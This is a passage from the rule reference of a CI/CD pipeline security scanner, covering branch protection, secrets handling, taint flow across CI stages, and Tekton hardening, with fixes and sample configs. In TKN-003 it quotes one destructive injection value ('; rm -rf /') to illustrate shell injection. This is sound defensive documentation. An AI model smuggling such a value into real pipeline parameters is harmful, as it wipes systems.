  • Repos that publish a SECURITY.md with an alternative out-of-band reporting channel (security@ mailbox, HackerOne / Bugcrowd program) cover the same control via a different mechanism. Suppress via ignore-file when the alternative is in place and documented.

Source: SCM-016 in the SCM provider.

SCM-017: Repository has no CODEOWNERS file MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. Probes the three canonical CODEOWNERS locations via GET /repos/{owner}/{repo}/contents/<path>. Fires when none of the three returns a file response. Pairs with SCM-011 (the protection-rule toggle): SCM-011 covers intent, SCM-017 covers reality. A repo with both in place can show that path-scoped review actually happens.

Recommendation. Add a CODEOWNERS file at .github/CODEOWNERS (the GitHub-recommended location), CODEOWNERS at the repo root, or docs/CODEOWNERS. Map directories to the team or individual responsible for them. With SCM-011's require_code_owner_reviews knob enabled, GitHub auto-requests review from the matched owners on every PR; without the file, the toggle is meaningless and any reviewer can approve any change.
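A minimal sketch of such a file (the org and team names are hypothetical; in CODEOWNERS the last matching pattern takes precedence):

```
# .github/CODEOWNERS — last matching pattern wins
*                     @example-org/maintainers
/.github/workflows/   @example-org/ci-security
/infra/               @example-org/platform
```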

Known false positives.

  • Single-team repos where every contributor is a code owner of every path may legitimately skip CODEOWNERS — the file adds no routing in that case. Suppress via ignore-file when the team intentionally stays flat. The same suppression applies to SCM-011.

Source: SCM-017 in the SCM provider.

SCM-018: Required PR reviews can be bypassed by named identities MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. Reads required_pull_request_reviews.bypass_pull_request_allowances from the branch protection payload. Fires when any of users / teams / apps is non-empty. Surfaces the counts so the operator can locate the bypass entries in the GitHub UI without re-running the audit manually.

Recommendation. In the default-branch protection rule, clear Allow specified actors to bypass required pull requests (required_pull_request_reviews.bypass_pull_request_allowances in the API). Required reviews are only as strong as the bypass list. If a release-bot account needs to merge automated PRs, prefer a separate protection rule for the bot's branch namespace rather than a bypass entry on the default branch.

Seen in the wild.

  • Multiple GitHub Security Lab writeups attribute post-incident review-control gaps to legacy bypass entries: a contractor onboarded years earlier is listed in the allowance, a compromise of that contractor account merges tampered code despite the team having added required reviews on the default branch.

Source: SCM-018 in the SCM provider.

SCM-019: Push restrictions allowlist names individual users LOW

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. Reads restrictions.users from the branch protection payload. Fires when the list is non-empty. restrictions itself being absent is the default GitHub posture (no push allowlist; review gates govern access) and passes this rule. Teams and apps in restrictions are not flagged — the rule audits the personal-account subset specifically.

Recommendation. In the default-branch protection rule, audit the Restrict who can push to matching branches allowlist (restrictions in the API). Move each individual user into a GitHub team and add the team instead, or replace with a GitHub App / bot service account when the entry is an automation. Named user entries are personal-compromise vectors that bypass every PR-review gate on the branch.

Known false positives.

  • A break-glass admin account intentionally listed for incident response is a legitimate use case. Suppress via ignore-file once the account's access has been reviewed (MFA, hardware token, audit-logged use).

Source: SCM-019 in the SCM provider.

SIGN-001: No AWS Signer profile defined for Lambda deploys MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. AWS Signer profiles are the upstream of LMB-001's code-signing config. Without a profile defined, no function in the account can enforce code signing, and LMB-001's recommendation has nothing to point at. The profile is the foundation; the per-function code-signing config attaches it.

Recommendation. Create an AWS Signer profile with platform AWSLambda-SHA384-ECDSA and reference it from every Lambda code-signing config used by the pipeline. Without a profile, LMB-001 remediation isn't possible and release artifacts can't be signed at build time.

Source: SIGN-001 in the AWS provider.

SIGN-002: AWS Signer profile is revoked or inactive HIGH

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. A revoked or canceled Signer profile invalidates every signature it ever produced. Lambda functions configured to enforce code-signing fail to deploy until the profile is replaced (or, if UntrustedArtifactOnDeployment = Warn, deploy with a CloudWatch warning the operator rarely reads).

Recommendation. Rotate the signing profile: create a replacement and update every code-signing config that references the revoked profile. A revoked or canceled profile invalidates every signature it produced; Lambdas relying on it will fail verification.

Source: SIGN-002 in the AWS provider.

SM-000: Secrets Manager API access failed INFO

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. See AWS provider documentation for the rule's detection mechanism.

Recommendation. See AWS provider documentation for the recommended remediation.

Source: SM-000 in the AWS provider.

SM-001: Secrets Manager secret has no rotation configured HIGH

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Only secrets actually referenced by CodeBuild are checked; secrets used purely by application workloads are out of scope for a CI/CD scanner.

Recommendation. Enable automatic rotation on every Secrets Manager secret referenced by a CodeBuild project or CodePipeline. Unrotated secrets persist indefinitely, so a single leak (e.g. a build log that echoed the value) compromises the secret for its full lifetime.

Source: SM-001 in the AWS provider.

SM-002: Secrets Manager resource policy allows wildcard principal CRITICAL

Evidences: CICD-SEC-8 Ungoverned Usage of 3rd-Party Services.

How this is detected. A wildcard-principal Allow on a Secrets Manager resource policy means any principal in any AWS account can call GetSecretValue (subject to conditions, if any). Always combine a wildcard principal with at least an aws:SourceAccount or aws:PrincipalOrgID condition; the lift-and-shift cross-account secret-access pattern needs that scoping.

Recommendation. Remove Allow statements whose Principal is * from every Secrets Manager resource policy, or scope them with a Condition restricting the source account/org (aws:PrincipalOrgID). A wildcard-principal policy allows any AWS account to call GetSecretValue on the secret.
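A sketch of the scoped shape, assuming the cross-account consumers live in the same AWS Organization (the org ID is a placeholder):

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "AllowOrgPrincipalsOnly",
      "Effect": "Allow",
      "Principal": { "AWS": "*" },
      "Action": "secretsmanager:GetSecretValue",
      "Resource": "*",
      "Condition": {
        "StringEquals": { "aws:PrincipalOrgID": "o-exampleorgid" }
      }
    }
  ]
}
```

The Principal stays a wildcard, but the Condition limits callers to principals inside the named organization.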

Source: SM-002 in the AWS provider.

SSM-000: SSM Parameter Store API access failed INFO

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. See AWS provider documentation for the rule's detection mechanism.

Recommendation. See AWS provider documentation for the recommended remediation.

Source: SSM-000 in the AWS provider.

SSM-001: SSM Parameter with secret-like name is not a SecureString HIGH

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. An SSM String parameter is plaintext at rest and over the API; ssm:GetParameter without any KMS Decrypt authority returns the value. SecureString adds KMS encryption plus the WithDecryption=true flag, which forces an explicit KMS authorization step. Secret-named parameters (TOKEN, PASSWORD, KEY) are almost always intended to be SecureString.

Recommendation. Recreate the parameter with Type=SecureString and migrate consumers to the new name if needed. Plain String parameters are visible via ssm:GetParameter without any KMS authorization.

Source: SSM-001 in the AWS provider.

SSM-002: SSM SecureString uses the default AWS-managed key MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. alias/aws/ssm is the AWS-managed default for SecureString. Its key policy is fixed and account-wide. A customer-managed key gives you the same per-parameter key-policy + CloudTrail audit story you'd apply to Secrets Manager (which always uses a CMK).

Recommendation. Recreate SecureString parameters with KeyId pointing at a customer-managed KMS key. The default alias/aws/ssm key is shared across the account and its key policy cannot be audited or scoped per parameter.

Source: SSM-002 in the AWS provider.

TAINT-001: Untrusted input flows across step boundaries via step outputs HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. GHA-003 detects the direct interpolation case (${{ github.event.* }} inside a run: body) and the single-step env-inheritance case. TAINT-001 fills the cross-step gap: a producer step sets a tainted step output, and a consumer step (in the same job) interpolates it via ${{ steps.<id>.outputs.<name> }}. The producer's interpolation is GHA-003's finding; TAINT-001's finding lives at the consumer (the actual injection sink) and carries the full chain in its description so a reader sees both sides at once.

v1 limitations: only same-job step outputs are tracked; jobs.<id>.outputs.* (cross-job propagation) and reusable-workflow input/output forwarding are tracked as future work in ROADMAP.md. The producer pass matches the canonical echo "name=..." >> $GITHUB_OUTPUT shape and the legacy ::set-output name=...:: workflow-command form.

Recommendation. Sanitise the value at the step that writes the $GITHUB_OUTPUT entry. The canonical pattern is to interpolate the untrusted source into an env: variable on the producer step and reference the env var in the echo: env: TITLE: ${{ github.event.issue.title }} then echo "title=$TITLE" >> $GITHUB_OUTPUT. After that, downstream steps reading steps.<id>.outputs.title see a string-typed value with no GitHub-expression evaluation pass left to exploit. Removing the source entirely is the safest fix; if the value genuinely needs to flow downstream, round-trip it through an env var the way GHA-003 recommends so the shell quoting still applies.
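A minimal sketch of that producer/consumer shape (the step id and output name are illustrative):

```yaml
jobs:
  triage:
    runs-on: ubuntu-latest
    steps:
      - id: meta
        env:
          TITLE: ${{ github.event.issue.title }}    # interpolation lands in an env var, not in shell text
        run: echo "title=$TITLE" >> "$GITHUB_OUTPUT"
      - env:
          TITLE: ${{ steps.meta.outputs.title }}    # consumer round-trips through env too
        run: echo "processing: $TITLE"
```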

Known false positives.

  • If the producer step deliberately runs a sanitiser between the interpolation and the $GITHUB_OUTPUT write (echo "$TITLE" | tr -dc 'a-zA-Z0-9 ' >> $GITHUB_OUTPUT), the consumer is no longer exploitable. The rule's regex doesn't model that transformation and will still fire; suppress via ignore-file scoped to the consumer step name when this is the deliberate shape. The producer's GHA-003 finding then carries the residual signal that the sanitiser is load-bearing.

Source: TAINT-001 in the GitHub Actions provider.

TAINT-002: Untrusted input flows across jobs via jobs.<id>.outputs: HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. TAINT-001 catches step-output flow within a single job; TAINT-002 catches the cross-job transition. Engine shape: walk every job's outputs: mapping looking for values that interpolate either a tainted step output or a direct ${{ github.event.* }} source. Tainted job outputs are matched against every ${{ needs.<job>.outputs.<name> }} reference in any downstream job's run: / with: body. Each match emits a TAINT-002 finding with the full chain in the description.

Same-step interpolations (the producer's own use of ${{ github.event.* }} inside its run:) are still GHA-003's responsibility; TAINT-002's value is the cross-job hop the single-step rule can't see.

Recommendation. Sanitise the value at the producer step before it lands in $GITHUB_OUTPUT. Once the value is in a job output, the consuming job has no expression-level escaping pass left: ${{ needs.<job>.outputs.<name> }} substitutes the string verbatim into the consumer's shell. The canonical safe pattern is to copy the untrusted source into the producer step's env: block, reference the env var quoted in echo "name=$VAR" >> $GITHUB_OUTPUT, and only then surface it through the job output. The consuming job should still treat the value as tainted (use it in env-var form, not interpolated directly into shell).
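Sketched across two jobs (job and output names are illustrative):

```yaml
jobs:
  produce:
    runs-on: ubuntu-latest
    outputs:
      title: ${{ steps.meta.outputs.title }}
    steps:
      - id: meta
        env:
          TITLE: ${{ github.event.issue.title }}       # interpolation confined to an env var
        run: echo "title=$TITLE" >> "$GITHUB_OUTPUT"
  consume:
    needs: produce
    runs-on: ubuntu-latest
    steps:
      - env:
          TITLE: ${{ needs.produce.outputs.title }}    # still handled as tainted: env-var form, quoted in shell
        run: echo "processing: $TITLE"
```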

Known false positives.

  • Sanitisation between the source interpolation and the $GITHUB_OUTPUT write isn't modeled. If the producer step runs echo "$TITLE" | tr -dc 'a-zA-Z0-9 ' before redirecting to GITHUB_OUTPUT, the consumer is no longer exploitable but TAINT-002 will still fire; suppress via ignore-file scoped to the consumer job's workflow file when this is the deliberate shape.

Source: TAINT-002 in the GitHub Actions provider.

TAINT-003: Untrusted input forwarded into reusable workflow with: HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Detection walks every jobs.<id>.uses: <callee> reference, finds every with: value that interpolates an attacker-controllable source (direct ${{ github.event.* }}, a tainted step output via ${{ steps.<id>.outputs.<name> }}, or a cross-job ${{ needs.<job>.outputs.<name> }}), and flags the forward.

When the callee body is loaded into the same scan (local ./.github/workflows/<file>.yml references via --gha-path, or remote refs fetched by --resolve-remote), the rule also checks whether the callee references ${{ inputs.<name> }} unquoted in a sink. Confirmed end-to-end paths get HIGH confidence; caller-side-only forwards stay at MEDIUM (still a risk surface, but a future change to the callee could expose it).

Recommendation. Sanitise the value at the caller before forwarding it across the reusable-workflow boundary. The canonical safe pattern is to copy the untrusted source into a step's env: block, run a sanitiser (tr -dc 'a-zA-Z0-9 ' is enough for a freeform title), surface the sanitised result via echo "name=$VAR" >> $GITHUB_OUTPUT, then forward ${{ steps.<id>.outputs.<name> }} as the with: input. The callee then sees a string-typed value with no expression-evaluation pass left to exploit. If the callee is under your control, also handle the input via env in the callee's run: body (not direct ${{ inputs.<name> }} interpolation).
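A caller-side sketch (the callee path, job ids, and input name are hypothetical):

```yaml
jobs:
  sanitise:
    runs-on: ubuntu-latest
    outputs:
      title: ${{ steps.clean.outputs.title }}
    steps:
      - id: clean
        env:
          RAW: ${{ github.event.issue.title }}
        run: echo "title=$(echo "$RAW" | tr -dc 'a-zA-Z0-9 ')" >> "$GITHUB_OUTPUT"
  call:
    needs: sanitise
    uses: ./.github/workflows/deploy.yml
    with:
      title: ${{ needs.sanitise.outputs.title }}   # only the sanitised string crosses the boundary
```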

Known false positives.

  • Callees that wrap the input safely (immediately copy into env, sanitise before use) make the caller-side forward harmless. When the callee body is loaded into the scan, the rule downgrades to MEDIUM confidence on those paths; suppress via ignore-file when the callee's handling is audited and sound. Without --resolve-remote the rule can't see remote callee bodies and every forward stays at MEDIUM, which is the right default for unverifiable cross-repo flow.

Source: TAINT-003 in the GitHub Actions provider.

TAINT-004: Untrusted input flows across jobs via dotenv artifact HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Detection is a two-pass walk over the pipeline. Pass 1 looks for jobs whose scripts write KEY=value to a file declared under artifacts.reports.dotenv: and whose value interpolates an attacker-controllable GitLab predefined variable (the UNTRUSTED_VAR_RE vocabulary GL-002 already uses). Pass 2 walks every job with a needs: / dependencies: link to a producer and looks for $KEY references in scripts matching a key recorded as tainted in pass 1.

v1 limitations: extends: job-template inheritance and cross-pipeline include: are not yet tracked. The dotenv path matching is exact apart from leading-./ normalization (./taint.env and taint.env are treated as the same path); no glob expansion is performed.

Recommendation. Sanitise the value at the producer job before it lands in the dotenv file. The canonical safe pattern is to copy the $CI_COMMIT_* / $CI_MERGE_REQUEST_* source into an intermediate shell variable, run a sanitiser (tr -dc 'a-zA-Z0-9 ' is enough for a freeform title), and only then write the cleaned value to dotenv. The consuming job should still treat the auto-imported variable as tainted, reference it quoted ("$TITLE") and never inline into a command without re-quoting. Removing the dotenv entirely is the strongest fix; if the value genuinely needs to flow downstream, validate the sanitiser is doing what you think before relying on it.
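A GitLab sketch of that shape (stage and job names are illustrative):

```yaml
produce:
  stage: build
  script:
    - TITLE=$(echo "$CI_COMMIT_TITLE" | tr -dc 'a-zA-Z0-9 ')   # sanitise before the dotenv write
    - echo "TITLE=$TITLE" > build.env
  artifacts:
    reports:
      dotenv: build.env

consume:
  stage: test
  needs: [produce]
  script:
    - echo "building for $TITLE"   # auto-imported variable, still referenced quoted
```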

Known false positives.

  • If the producer job runs a sanitiser between the tainted source interpolation and the dotenv write (echo "$CI_COMMIT_TITLE" | tr -dc 'a-zA-Z0-9 ' > taint.env), the consumer is no longer exploitable but TAINT-004 still fires. Suppress via ignore-file scoped to the consumer job's pipeline file when this is the deliberate shape; the sanitiser is then load-bearing and any future regression in it would re-expose the consumer.

Source: TAINT-004 in the GitLab CI provider.

TAINT-005: Untrusted input flows across steps via buildkite-agent meta-data HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Detection is a two-pass walk over the pipeline. Pass 1 looks for buildkite-agent meta-data set <key> <value> invocations whose <value> interpolates an attacker-controllable Buildkite predefined variable (the same BUILDKITE_* vocabulary BK-003 uses). Pass 2 walks every step for buildkite-agent meta-data get <key> invocations and matches against the producer keys recorded in pass 1.

Buildkite meta-data is per-build, not per-step; any step in the same build can read what any earlier step wrote regardless of depends_on:. The detector doesn't model temporal ordering and fires whenever both a tainted set and a get of the same key exist in the same pipeline file. v1 limitations: meta-data exists (returns 0/1 status) and the --default form aren't tracked; plugins providing their own meta-data abstraction (e.g. cattle-ops/github-merged-pr) aren't introspected.

Recommendation. Sanitise the value at the producer step before it lands in the meta-data store. The canonical safe pattern is to copy the $BUILDKITE_PULL_REQUEST_* / $BUILDKITE_MESSAGE / branch / commit / author source into an intermediate shell variable, run a sanitiser (tr -dc 'a-zA-Z0-9 ' is enough for a freeform title), and only then call buildkite-agent meta-data set. The consuming step should still reference the $(buildkite-agent meta-data get ...) value quoted ("$TITLE") and never inline into a command without re-quoting. Removing the meta-data flow entirely is the strongest fix; if the value genuinely needs to flow downstream, validate the sanitiser is doing what you think before relying on it.
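A Buildkite sketch of that shape (labels and the meta-data key are illustrative):

```yaml
steps:
  - label: "produce"
    command: |
      TITLE=$(echo "$BUILDKITE_MESSAGE" | tr -dc 'a-zA-Z0-9 ')   # sanitise before the set
      buildkite-agent meta-data set title "$TITLE"
  - label: "consume"
    command: |
      TITLE="$(buildkite-agent meta-data get title)"
      echo "processing: $TITLE"   # re-quoted on every use
```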

Known false positives.

  • If the producer step runs a sanitiser between the tainted source interpolation and the meta-data set call (echo "$BUILDKITE_PULL_REQUEST_TITLE" | tr -dc 'a-zA-Z0-9 ' | xargs -I{} buildkite-agent meta-data set title {}), the consumer is no longer exploitable but TAINT-005 still fires. Suppress via ignore-file scoped to the consumer step's pipeline file when this is the deliberate shape; the sanitiser is then load-bearing and any future regression in it would re-expose the consumer.

Source: TAINT-005 in the Buildkite provider.

TAINT-006: Untrusted input flows across tasks via Tekton results HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Detection walks every Pipeline document. Pass 1 looks for tasks whose body's steps[*].script writes to $(results.<X>.path) AND interpolates a $(params.<Y>) reference, recording X as a tainted result for that producer task. Pass 2 walks every task for params: whose value: is $(tasks.<producer>.results.<X>). When (producer, X) matches a tainted result and the consumer's body's steps[*].script references $(params.<consumer-name>) (where consumer-name is the param the result was forwarded into), TAINT-006 fires.

Body resolution: inline taskSpec: blocks are walked directly; taskRef: { name: <X> } references resolve against Task / ClusterTask documents loaded into the same scan, so a Pipeline that splits the producer / consumer task definitions into separate files still trips the rule. bundle: and resolver: (remote OCI / Tekton-resolver-framework references) aren't followed; they require network fetches the scanner deliberately avoids. finally: blocks aren't walked yet.

Recommendation. Sanitise the value at the producer task before it lands in $(results.<name>.path). The canonical safe pattern is to copy the $(params.<name>) source into an intermediate shell variable, run a sanitiser (tr -dc 'a-zA-Z0-9 ' for a freeform title), and only then write the cleaned value to the result file. The consumer task should still treat its own param as tainted: surface $(params.<name>) into a quoted shell variable (TITLE="$(params.title)") before interpolating elsewhere. Removing the cross-task results forwarding is the strongest fix; if the value genuinely needs to flow downstream, validate the sanitiser is doing what you think before relying on it.
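A producer-side sketch of the pattern the recommendation describes (task, param, result names, and the image are illustrative):

```yaml
apiVersion: tekton.dev/v1
kind: Task
metadata:
  name: produce
spec:
  params:
    - name: title
  results:
    - name: clean-title
  steps:
    - name: emit
      image: busybox
      script: |
        TITLE="$(params.title)"                  # surfaced into a quoted shell variable first
        echo "$TITLE" | tr -dc 'a-zA-Z0-9 ' > "$(results.clean-title.path)"
```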

Known false positives.

  • If the producer task runs a sanitiser between the tainted $(params.X) interpolation and the $(results.Y.path) write, the consumer is no longer exploitable but TAINT-006 still fires. Suppress via ignore-file scoped to the consumer task name when this is the deliberate shape; the sanitiser is then load-bearing.

Source: TAINT-006 in the Tekton provider.

TAINT-007: Untrusted input flows across templates via Argo outputs.parameters HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Detection walks every workflow document with spec.templates. Pass 1 looks for templates that declare outputs.parameters AND whose inline script.source interpolates {{inputs.parameters.<X>}}, recording the template's outputs as tainted. Pass 2 walks each template's DAG / Steps orchestrator for tasks whose arguments.parameters[*].value is {{tasks.<producer>.outputs.parameters.<X>}} matching a recorded leak. Pass 3 walks the consumer task's referenced template for the matching {{inputs.parameters.<consumer-param>}} reference in its script body and emits one path per match.

v1 limitations: workflowTemplateRef: cross-document references aren't resolved (would need the same machinery as the GHA --resolve-remote flow). onExit: exit handlers aren't yet walked.

Recommendation. Sanitise the value at the producer template before it lands in an output parameter. The canonical safe pattern is to surface {{inputs.parameters.<X>}} into a quoted shell variable, run a sanitiser (tr -dc 'a-zA-Z0-9 ' for a freeform title), and only then redirect the cleaned value to the output path. The consumer template should still reference {{inputs.parameters.<name>}} quoted ("{{inputs.parameters.title}}") and never inline into a command without re-quoting. Removing the cross-template forwarding is the strongest fix; if the value genuinely needs to flow downstream, validate the sanitiser is doing what you think before relying on it.
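A producer-template sketch of that pattern (template, parameter names, and the image are illustrative):

```yaml
templates:
  - name: produce
    inputs:
      parameters:
        - name: title
    script:
      image: alpine
      command: [sh]
      source: |
        TITLE="{{inputs.parameters.title}}"      # quoted shell variable before any other use
        echo "$TITLE" | tr -dc 'a-zA-Z0-9 ' > /tmp/clean-title
    outputs:
      parameters:
        - name: clean-title
          valueFrom:
            path: /tmp/clean-title
```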

Known false positives.

  • If the producer template runs a sanitiser between the tainted {{inputs.parameters.X}} interpolation and the output-path write, the consumer is no longer exploitable but TAINT-007 still fires. Suppress via ignore-file scoped to the consumer template name when this is the deliberate shape; the sanitiser is then load-bearing.

Source: TAINT-007 in the Argo Workflows provider.

TAINT-008: Untrusted input flows via GitLab extends: template inheritance HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Two-pass walk over the pipeline doc. Pass 1 builds a universe of every job-shaped entry (hidden templates included, top-level keywords excluded), resolves each non-hidden job's extends: chain transitively, and gathers tainted variables (any $CI_COMMIT_* / $CI_MERGE_REQUEST_* interpolation in the link's variables: block). Pass 2 walks the consuming job's before_script: / script: / after_script: for unquoted $<name> references matching an inherited tainted variable. Cycles in the extends chain are broken via a visited set; unresolvable extends entries are silently dropped.

v1 limitations: include: cross-pipeline file inclusion isn't tracked yet (would need cross-document analysis like the GHA --resolve-remote flow). extends: chains that pull templates from include-d files are only partially resolved: in-document links resolve; external links are treated as missing.

Recommendation. Move the tainted-source interpolation out of the template's variables: block. The canonical safe pattern is to receive the source value through $CI_* directly in the consuming job's script (or a dedicated sanitiser step) and never copy it into a shared variable a downstream job can interpolate unquoted. If the inheritance is genuinely needed, sanitise at the boundary (TITLE_SAFE: '$(echo "$CI_COMMIT_TITLE" | tr -dc "a-zA-Z0-9 ")') and have the extending job reference the cleaned variable. Removing the extends: propagation is the strongest fix; if the value genuinely needs to flow downstream, validate the sanitiser is doing what you think before relying on it.
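The boundary-sanitiser shape above, sketched as a pair of hypothetical jobs (.build-base, deploy):

```yaml
.build-base:
  variables:
    # Sanitise at the boundary; extending jobs inherit only the cleaned value.
    TITLE_SAFE: '$(echo "$CI_COMMIT_TITLE" | tr -dc "a-zA-Z0-9 ")'

deploy:
  extends: .build-base
  script:
    - echo "Deploying: $TITLE_SAFE"   # reference the cleaned variable, quoted
```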

Known false positives.

  • If the consuming job sanitises the inherited variable before referencing it (CLEAN=$(echo "$TITLE" | tr -dc 'a-zA-Z0-9 '); echo $CLEAN), the rule still fires on the original $TITLE reference even though the sanitised value is what reaches the shell. Suppress via ignore-file scoped to the consuming job's name when the sanitiser is audited and load-bearing.

Source: TAINT-008 in the GitLab CI provider.

TF-001: aws_iam_access_key declares a long-lived access key CRITICAL

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. See Terraform provider documentation for the rule's detection mechanism.

Recommendation. See Terraform provider documentation for the recommended remediation.

Source: TF-001 in the Terraform provider.

TF-002: Resource attribute carries a hard-coded secret shape CRITICAL

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. See Terraform provider documentation for the rule's detection mechanism.

Recommendation. See Terraform provider documentation for the recommended remediation.

Source: TF-002 in the Terraform provider.

TF-003: CodeBuild VPC shares its VPC with a public subnet HIGH

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. See Terraform provider documentation for the rule's detection mechanism.

Recommendation. See Terraform provider documentation for the recommended remediation.

Source: TF-003 in the Terraform provider.

TKN-001: Tekton step image not pinned to a digest HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Applies to Task and ClusterTask kinds. The image must contain @sha256: followed by a 64-char hex digest. Any tag-only reference, including :latest, fails.

Recommendation. Pin every step image to a content-addressable digest (gcr.io/tekton-releases/git-init@sha256:<digest>). Tag-only references (alpine:3.18) and rolling tags (alpine:latest) let a compromised registry update redirect the step at the next pull, with no audit trail in the Task manifest.
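The pinned form, sketched below; `<digest>` is a placeholder for the real 64-char hex value, which you resolve once and commit:

```yaml
steps:
  - name: clone
    # Content-addressable: the manifest records exactly which image bytes run.
    image: gcr.io/tekton-releases/git-init@sha256:<digest>
  - name: build
    # Tag-only (alpine:3.18) would fail this check; resolve it to its digest.
    image: docker.io/library/alpine@sha256:<digest>
```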

Source: TKN-001 in the Tekton provider.

TKN-002: Tekton step runs privileged or as root HIGH

Evidences: CICD-SEC-5 Insufficient PBAC.

How this is detected. Detection fires on a step with securityContext.privileged: true, securityContext.runAsUser: 0, securityContext.runAsNonRoot: false, securityContext.allowPrivilegeEscalation: true, or no securityContext block at all.

Recommendation. Set securityContext.privileged: false, runAsNonRoot: true, and allowPrivilegeEscalation: false on every step. A privileged step shares the node's kernel namespaces; a malicious or compromised step image then has root on the build node, breaking the boundary between build and cluster.
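A hardened step sketch; the UID is a hypothetical non-root value:

```yaml
steps:
  - name: build
    image: docker.io/library/alpine@sha256:<digest>
    securityContext:
      privileged: false
      runAsNonRoot: true
      runAsUser: 65532               # hypothetical non-root UID
      allowPrivilegeEscalation: false
```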

Source: TKN-002 in the Tekton provider.

TKN-003: Tekton param interpolated unsafely in step script CRITICAL

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Fires on any $(params.X) or $(workspaces.X.path) token inside a script: body that isn't already wrapped in double quotes ("$(params.X)"). Doesn't fire on the env-var indirection pattern, which is safe.

Recommendation. Don't interpolate $(params.<name>) directly into the step script:. Tekton substitutes the value before the shell parses it, so a parameter containing ; rm -rf / runs as shell. Receive the parameter through env: (valueFrom: ... or value: $(params.<name>)) and reference the env var quoted in the script ("$NAME"); or pass it as a positional argument to a shell function.
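The env-var indirection the rule treats as safe, sketched with a hypothetical target parameter:

```yaml
params:
  - name: target
steps:
  - name: build
    image: docker.io/library/alpine@sha256:<digest>
    env:
      - name: TARGET
        value: $(params.target)      # substitution lands in the env var value
    script: |
      #!/bin/sh
      # The shell only ever sees a quoted variable expansion, never raw parameter text.
      echo "building for: $TARGET"
```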

Source: TKN-003 in the Tekton provider.

TKN-004: Tekton Task mounts hostPath or shares host namespaces CRITICAL

Evidences: CICD-SEC-5 Insufficient PBAC.

How this is detected. Checks spec.volumes[].hostPath (legacy v1beta1 form), spec.workspaces[].volumeClaimTemplate.spec.storageClassName == 'hostpath', and spec.podTemplate host-namespace flags.

Recommendation. Use Tekton workspaces: backed by emptyDir or persistentVolumeClaim instead of hostPath. Drop hostNetwork: true / hostPID: true / hostIPC: true on the Task's podTemplate. A hostPath mount of /var/run/docker.sock or / lets the build break out of the pod and act as the underlying node.
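On the run side, the safe replacement binds the workspace to an ephemeral volume; names are hypothetical:

```yaml
apiVersion: tekton.dev/v1
kind: TaskRun
metadata:
  name: build-run
spec:
  taskRef:
    name: build
  workspaces:
    - name: scratch
      emptyDir: {}       # pod-scoped scratch space; no host filesystem exposure
```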

Source: TKN-004 in the Tekton provider.

TKN-005: Literal secret value in Tekton step env or param default CRITICAL 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene, CICD-SEC-7 Insecure System Configuration.

How this is detected. Strong matches: AWS access keys, GitHub PATs, JWTs. Weak match: env var name suggests a secret (*_TOKEN, *_KEY, *PASSWORD, *SECRET) and the value is a non-empty literal rather than a $(params.X) / valueFrom reference.

Recommendation. Mount secrets via env.valueFrom.secretKeyRef (or a volumes: Secret mount) instead of writing the value into env.value or params[].default. Task manifests are committed to git and cluster-readable; literal values leak through normal access paths.
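The secretKeyRef shape, with a hypothetical Secret name:

```yaml
env:
  - name: API_TOKEN
    valueFrom:
      secretKeyRef:
        name: api-credentials   # hypothetical Secret; lives in the cluster, not in git
        key: token
```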

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: TKN-005 in the Tekton provider.

TKN-006: Tekton run lacks an explicit timeout LOW

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Applies to PipelineRun, TaskRun, and Pipeline. For Pipelines, the rule looks for spec.tasks[].timeout as evidence of intent. Task / ClusterTask themselves don't carry a timeout; the timeout lives on the concrete run.

Recommendation. Set spec.timeouts.pipeline (or spec.timeout on a TaskRun) on every PipelineRun and TaskRun. A misbehaving step otherwise pins a build pod for the cluster's default timeout (1h). For long jobs, set a generous explicit value (2h, 6h) rather than leaving it implicit.
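An explicit-timeout sketch on a hypothetical PipelineRun:

```yaml
apiVersion: tekton.dev/v1
kind: PipelineRun
metadata:
  name: nightly-build
spec:
  pipelineRef:
    name: build-pipeline
  timeouts:
    pipeline: "2h"       # explicit overall budget for the whole run
```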

Source: TKN-006 in the Tekton provider.

TKN-007: Tekton run uses the default ServiceAccount MEDIUM

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. An explicit serviceAccountName: default setting is treated the same as omission.

